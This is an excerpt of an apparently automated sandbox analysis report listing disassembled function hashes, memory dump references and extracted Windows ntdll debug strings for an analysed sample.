                                                                      • Opcode Fuzzy Hash: f6875f1c0be60a9c721b8f0c0f45ea081444ff61e734471bc05f446edff25abd
                                                                      • Instruction Fuzzy Hash: C22136BAE01210ABD7018B6EDD51BAABBF5FF45748F184069E889E7341EA38D905CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: a2acdb5c5ab674300eb15232852164bf81943f475290c20133dedffa568e15e6
                                                                      • Instruction ID: 4fafabb39c0b389a129a298bb0d4e36e3d472bc8294889566fbb88c3c83e26f5
                                                                      • Opcode Fuzzy Hash: a2acdb5c5ab674300eb15232852164bf81943f475290c20133dedffa568e15e6
                                                                      • Instruction Fuzzy Hash: 7D51EC34E00725EFEB06EB65C858BADBBB4FF44356F20412AEA0297290DB74D911DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                      • API String ID: 0-3178619729
                                                                      • Opcode ID: 413d9b8149450025c8f0f4d6d23fe1e08ac95ed56be12ef3ba692990b8aa1376
                                                                      • Instruction ID: c428392edd70a2cc8dc8da93b8b46ccc6d1eeb97a29aa6615c41b447fa9af97a
                                                                      • Opcode Fuzzy Hash: 413d9b8149450025c8f0f4d6d23fe1e08ac95ed56be12ef3ba692990b8aa1376
                                                                      • Instruction Fuzzy Hash: EE22F2B5A10B55AFEB02DF24C890B6ABBF5FF05704F248499E8458F281DB36D981CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                      • API String ID: 0-1168191160
                                                                      • Opcode ID: e50268f516270e5e2e377573a1751ea33368e4083bc08b6ac962079d940d7eda
                                                                      • Instruction ID: 1ffa09fdbf586b1f8a978252cbb2bddfc51beb27b520dfb86a002204b0d36574
                                                                      • Opcode Fuzzy Hash: e50268f516270e5e2e377573a1751ea33368e4083bc08b6ac962079d940d7eda
                                                                      • Instruction Fuzzy Hash: 42F16EB5E002388BDB20CF19CC90BD9B3B5EF44744F5550E9EA19A7241EB319E85CFA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36AE1648
                                                                      • HEAP[%wZ]: , xrefs: 36AE1632
                                                                      • HEAP: , xrefs: 36AE14B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                      • API String ID: 0-3178619729
                                                                      • Opcode ID: fead1f0421ee5d043213c6b2c1870d4e43eb832bcac60e369beb3b74cd7cb9da
                                                                      • Instruction ID: d30a6c5bccf3ccc6c64d44abf7d7351a077086f622052f20dcc003f6f305be59
                                                                      • Opcode Fuzzy Hash: fead1f0421ee5d043213c6b2c1870d4e43eb832bcac60e369beb3b74cd7cb9da
                                                                      • Instruction Fuzzy Hash: 55E1E1B4A043659BEB14CF29C850BBAFBF5EF48308F24885EE996CB245E734D941CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 36B500C7
                                                                      • RTL: Re-Waiting, xrefs: 36B50128
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 36B500F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      • Opcode ID: a4ee17f298ad53b830e7b9de301b76c472193036ff480d4f7837fac17282deaf
                                                                      • Instruction ID: 04c2eb7104b53526ecf0cf9207b453dc7719977d2f9acc8fde32aa2bb49f2a21
                                                                      • Opcode Fuzzy Hash: a4ee17f298ad53b830e7b9de301b76c472193036ff480d4f7837fac17282deaf
                                                                      • Instruction Fuzzy Hash: 32E1C174A08751DFE711CF28C840B5ABBE4FB84358F144A59FAA58B2D1DB74D845CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                      • API String ID: 0-1145731471
                                                                      • Opcode ID: 010c278142a50de6cbbc60f926ce86e5a99ab7488c7a27c05d24b221b235792f
                                                                      • Instruction ID: 8192fa4636ce6ecc0a2fc305e32d905f4f47275d7bb111a8972fe79ddca4a425
                                                                      • Opcode Fuzzy Hash: 010c278142a50de6cbbc60f926ce86e5a99ab7488c7a27c05d24b221b235792f
                                                                      • Instruction Fuzzy Hash: 72B1EC74A067168BEB16EF6AC990B9DB3F1EF45794F684429E811EB780D770E840CF20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                      • API String ID: 0-2391371766
                                                                      • Opcode ID: 04c4746217fc05d43ef53e685cc857db8c0e0107ff005efdb1ae856cd36f13ce
                                                                      • Instruction ID: 6ab42cc1dd824bb478c46f09754e0128368460b9b5c2208bab0d84d0cb66a5b0
                                                                      • Opcode Fuzzy Hash: 04c4746217fc05d43ef53e685cc857db8c0e0107ff005efdb1ae856cd36f13ce
                                                                      • Instruction Fuzzy Hash: 4AB19B71A08355AFE311DF56CC90B5BB7E8EB48758F401929FA449B280DB75E808CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                      • API String ID: 0-1146358195
                                                                      • Opcode ID: cbf167365de1a439716a7261e67c6954a48956b5a2eb77bae93019a9a7e998c3
                                                                      • Instruction ID: da03f961f350e1a528f59cfee852b74a7bf73a6a504ecdb2df9f0b0f68f60c61
                                                                      • Opcode Fuzzy Hash: cbf167365de1a439716a7261e67c6954a48956b5a2eb77bae93019a9a7e998c3
                                                                      • Instruction Fuzzy Hash: 7CA16A71A083919FD711DF65C890B1BBBE8EF84B94F41092DB989A7251DB31DD08CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                      • API String ID: 0-318774311
                                                                      • Opcode ID: 46bc35b9cf3ba520bb2154f95fa6baa060f4ac21557ace0e9fbaa227360dbae5
                                                                      • Instruction ID: a4d33c477f7808c5d7eea7d50b99700c4db9400163e8aa603b7cd1a11a7cdfa7
                                                                      • Opcode Fuzzy Hash: 46bc35b9cf3ba520bb2154f95fa6baa060f4ac21557ace0e9fbaa227360dbae5
                                                                      • Instruction Fuzzy Hash: D5817AB5618350AFE721CB25C880B6AB7E8EF84754F410929F9A49B290DB75DD04CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                      • API String ID: 0-3870751728
                                                                      • Opcode ID: ac6d742f4e5d9e92f7f71093853dd7ba664e24bbe01ced3beff2c44fdd8ff18f
                                                                      • Instruction ID: 756e12a485bfd505224669a58bb20676c6a72c4f8986460297c25c2b848c21de
                                                                      • Opcode Fuzzy Hash: ac6d742f4e5d9e92f7f71093853dd7ba664e24bbe01ced3beff2c44fdd8ff18f
                                                                      • Instruction Fuzzy Hash: 0D913CB4E006159FEB14CF6AC894B9DBBB1FF48318F24817AE904AB391E7359841CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                      • API String ID: 0-373624363
                                                                      • Opcode ID: ecce0a8fc97a8e010e895cb928647d1af432f89131da7bde790ace74b5293713
                                                                      • Instruction ID: 58c80f7139674bc309b0c33ba9d163050b6a2fa6c188b7ea1ae5e8d9ad7d9e34
                                                                      • Opcode Fuzzy Hash: ecce0a8fc97a8e010e895cb928647d1af432f89131da7bde790ace74b5293713
                                                                      • Instruction Fuzzy Hash: EC91CE75E06365CBEB12CF56CA547ADB7F0EF00368F644196EC11AB290D7789A80CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • TargetNtPath, xrefs: 36BBB3AF
                                                                      • GlobalizationUserSettings, xrefs: 36BBB3B4
                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36BBB3AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                      • API String ID: 0-505981995
                                                                      • Opcode ID: 5d64a30b11d9a1b8f42bd01bd88997884edc869d35a7a4d983986c2113e2e845
                                                                      • Instruction ID: 79b2fa96913f9e96b69d2174c80986d494e95a05fa54c4485c09017f16d4960a
                                                                      • Opcode Fuzzy Hash: 5d64a30b11d9a1b8f42bd01bd88997884edc869d35a7a4d983986c2113e2e845
                                                                      • Instruction Fuzzy Hash: D0616D72D01229AFDF21DF55DC98BA9B7B8FB04710F4101E9A908AB250DB74DE84CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36B3E455
                                                                      • HEAP[%wZ]: , xrefs: 36B3E435
                                                                      • HEAP: , xrefs: 36B3E442
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                      • API String ID: 0-1340214556
                                                                      • Opcode ID: bb49ba40e6e0995e4888b51c5fd3522f9b34b02d7efacd57e0dc9e4b51b1a305
                                                                      • Instruction ID: 2f3825e36d401148785319f9a59d8883b7d5e4bc33f28883a7cfdcddf7e954d7
                                                                      • Opcode Fuzzy Hash: bb49ba40e6e0995e4888b51c5fd3522f9b34b02d7efacd57e0dc9e4b51b1a305
                                                                      • Instruction Fuzzy Hash: 02512735A01794EFE712CB65CDA4F9ABBF8FF04344F1440A6E9408B262D734E905CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 36B4A396
                                                                      • LdrpCompleteMapModule, xrefs: 36B4A39D
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 36B4A3A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: 070ff2ca1945962cf5db3a4ff7293c4004413132f24f67194351c6d7e4a57c0c
                                                                      • Instruction ID: 9367e0d853406e6e7a40889ed3f95a5e601ff4055e8f8bde85e2f0ef059a3ff6
                                                                      • Opcode Fuzzy Hash: 070ff2ca1945962cf5db3a4ff7293c4004413132f24f67194351c6d7e4a57c0c
                                                                      • Instruction Fuzzy Hash: 22512278A00761DBF726DBA9C945B0ABFE4EB00758F105194EA529F2D2DB74E800CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 36B8D7B2
                                                                      • HEAP[%wZ]: , xrefs: 36B8D792
                                                                      • HEAP: , xrefs: 36B8D79F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                      • API String ID: 0-3815128232
                                                                      • Opcode ID: 5ee6cabe78b086f30417b1abb31fefb5489f494d3e1fe352533cf6ba0cd3105b
                                                                      • Instruction ID: f14ce2b65641f8ca4db1c7338f75cd0e18ddda477f5f9f49c189048af3a85245
                                                                      • Opcode Fuzzy Hash: 5ee6cabe78b086f30417b1abb31fefb5489f494d3e1fe352533cf6ba0cd3105b
                                                                      • Instruction Fuzzy Hash: B851E27E5003E48EF350DF2AC84077277E2EB452C8F91488FE4C58B685E62AD846DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                      • API String ID: 0-1151232445
                                                                      • Opcode ID: 6a1202175c29301ea584fd6c546b79dd9153822f27172e09e40318824c4b8b9b
                                                                      • Instruction ID: 23c2e1ee0bd059875555d1f465873493e022848a73341e849513361aa36467bc
                                                                      • Opcode Fuzzy Hash: 6a1202175c29301ea584fd6c546b79dd9153822f27172e09e40318824c4b8b9b
                                                                      • Instruction Fuzzy Hash: F9412578B413A0CFFB18CE19C4A8769BBE0EF0124AF7440A9CC458F656DAB4D845CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36B51943
                                                                      • LdrpAllocateTls, xrefs: 36B5194A
                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 36B51954
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                      • API String ID: 0-4274184382
                                                                      • Opcode ID: 610262fda28012d478f510796478bf9b018993848317b7a318ec2257a9435038
                                                                      • Instruction ID: 16c5bf7a790c3dc1c8723623f6d9bb581e445cb10ac91087735547722590ed1b
                                                                      • Opcode Fuzzy Hash: 610262fda28012d478f510796478bf9b018993848317b7a318ec2257a9435038
                                                                      • Instruction Fuzzy Hash: 374169B5E00609AFDB14CFA9CD50AAEBBB5FF48304F058129E905BB251DB35A801CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Actx , xrefs: 36B132CC
                                                                      • RtlCreateActivationContext, xrefs: 36B52803
                                                                      • SXS: %s() passed the empty activation context data, xrefs: 36B52808
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                      • API String ID: 0-859632880
                                                                      • Opcode ID: cc7b22521da76367147df00072e93f6fb994b6906f3a89aec95f2d1658779c86
                                                                      • Instruction ID: 52d24bb4fff4c1a65cc3aca874bc3afcf521d636b2561b7141b618a79a0a4daa
                                                                      • Opcode Fuzzy Hash: cc7b22521da76367147df00072e93f6fb994b6906f3a89aec95f2d1658779c86
                                                                      • Instruction Fuzzy Hash: DA313F72A00315AFEB16CF69E890F9A37A4EF04714F124469EE049F285EB75D806CFE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • @, xrefs: 36B6B2F0
                                                                      • GlobalFlag, xrefs: 36B6B30F
                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 36B6B2B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                      • API String ID: 0-4192008846
                                                                      • Opcode ID: 089447489d1edd123630318db93d68a35559ee48eeb3422fbc4d4e0c2241b0f9
                                                                      • Instruction ID: e593221e271100560ee01ce76ed232a817dd95a0f716e482e0a37117c0d6292a
                                                                      • Opcode Fuzzy Hash: 089447489d1edd123630318db93d68a35559ee48eeb3422fbc4d4e0c2241b0f9
                                                                      • Instruction Fuzzy Hash: C2314AB1E00219AFDB10DFA6CC80AEEBBBCEB44344F400469AA05AB140D6349E04CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 36B5184A
                                                                      • LdrpInitializeTls, xrefs: 36B51851
                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 36B5185B
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                      • API String ID: 0-931879808
                                                                      • Opcode ID: 16a46b1d9a5fbc653495cdcedaa395062db0db656ca07ad643a8db9eb5404c02
                                                                      • Instruction ID: 335c2693f3221d761cfdfee0e25cfe7e8fb5fd5b4558981309b9e0ee04dbf4a7
                                                                      • Opcode Fuzzy Hash: 16a46b1d9a5fbc653495cdcedaa395062db0db656ca07ad643a8db9eb5404c02
                                                                      • Instruction Fuzzy Hash: 8031B172E10214BBE7108F59CC95F9A7EB9EB40399F150159E702BB180EB74AD45CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • @, xrefs: 36B211C5
                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 36B2119B
                                                                      • BuildLabEx, xrefs: 36B2122F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                      • API String ID: 0-3051831665
                                                                      • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                      • Instruction ID: f0a554c631157011ce0f9c24207df95e4cc814d54a33e56cbf4cbc6ca603a177
                                                                      • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                      • Instruction Fuzzy Hash: 0D317EB2900619BFDB11DBA5CC44EEEBBB9EB85754F014025FA08E7260E730DA05CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
